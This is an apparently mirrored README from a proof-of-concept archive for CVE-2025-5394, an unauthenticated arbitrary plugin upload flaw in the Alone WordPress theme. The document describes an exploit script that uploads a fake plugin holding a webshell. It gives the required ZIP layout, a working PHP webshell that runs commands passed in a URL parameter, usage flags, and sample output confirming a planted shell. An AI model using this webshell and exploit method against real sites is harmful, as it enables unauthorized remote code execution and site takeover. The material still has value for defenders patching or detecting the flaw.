Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-5394 PoC — WordPress plugin Alone 安全漏洞

Source
https://github.com/Nxploited/CVE-2025-5394
Associated Vulnerability
Title:WordPress plugin Alone 安全漏洞 (CVE-2025-5394)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Alone 7.8.3及之前版本存在安全漏洞,该漏洞源于函数alone_import_pack_install_plugin缺少能力检查,可能导致任意文件上传。
Description
Alone – Charity Multipurpose Non-profit WordPress Theme <= 7.8.3 - Missing Authorization to Unauthenticated Arbitrary File Upload via Plugin Installation
Readme
# 🚨 CVE-2025-5394 - Unauthenticated Arbitrary Plugin Upload in Alone Theme

## 📌 Affected Product:
**Alone – Charity Multipurpose Non-profit WordPress Theme**  
**Versions:** <= 7.8.3  
**CVE:** CVE-2025-5394  
**CVSS Score:** 9.8 (Critical)

## 🔥 Vulnerability Summary:
The Alone theme for WordPress is vulnerable to **arbitrary file uploads** due to a **missing capability check** on the `alone_import_pack_install_plugin()` function.  
This flaw allows **unauthenticated attackers** to **upload ZIP files** (disguised as plugins) from **remote locations**, potentially achieving **remote code execution**.

---

## ⚙️ Exploit Script (Python)
This repository contains a Python script that **automates the exploitation** of CVE-2025-5394.  
The script triggers the vulnerable AJAX action and uploads a fake plugin (containing a webshell) directly to the WordPress server.

---

## 📁 Webshell Requirements:
The uploaded **ZIP file** must follow this structure:

```
shell_plugin.zip
└── shell_plugin
    └── shell_plugin.php
```

Where:
- `shell_plugin` is the plugin directory.
- `shell_plugin.php` is a valid PHP plugin file **with a plugin header**.
- The PHP file can contain a webshell payload.

Example of minimal plugin header inside `shell_plugin.php`:

```php
<?php
/*
Plugin Name: Webshell
*/
system($_GET['cmd']);
?>
```

---

## 🚀 Example Usage:

```bash
python3 CVE-2025-5394.py -help
```

```
usage: CVE-2025-5394.py [-h] -u URL -s SHELL

CVE-2025-5394 Exploit | by Khaled Alenazi (Nxploited)

options:
  -h, --help         show this help message and exit
  -u, --url URL      Target WordPress site URL
  -s, --shell SHELL  ZIP file URL containing webshell (.zip)
```

---

## ✅ Successful Output:

```bash
python3 CVE-2025-5394.py -u http://target.com/wordpress/ -s http://target.com/shell_plugin.zip
[>] Target        : http://target.com/wordpress
[>] Shell URL     : http://target.com/shell.php
[>] Plugin Slug   : shell_plugin
[>] Sending exploit...
[+] Exploit successful
[+] Webshell URL  : http://target.com/wordpress/wp-content/plugins/shell_plugin/shell_plugin.php
```

---

## ⚠️ Disclaimer:
This script is provided **for educational and research purposes only**.  
The author is **not responsible** for any misuse or illegal activity conducted using this code.  
Use it **only on systems you own or have explicit permission to test**.

---

## 👨‍💻 By:
**Nxploited ( Khaled Alenazi )**  
GitHub: [https://github.com/Nxploited](https://github.com/Nxploited)
File Snapshot

 [4.0K]  /data/pocs/706c95526fcf4b5ec3ab7909fa5d4f7b63d1c64a
├── [3.5K]  CVE-2025-5394.py
├── [1.5K]  LICENSE
├── [2.5K]  README.md
└── [   9]  requirements.txt

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.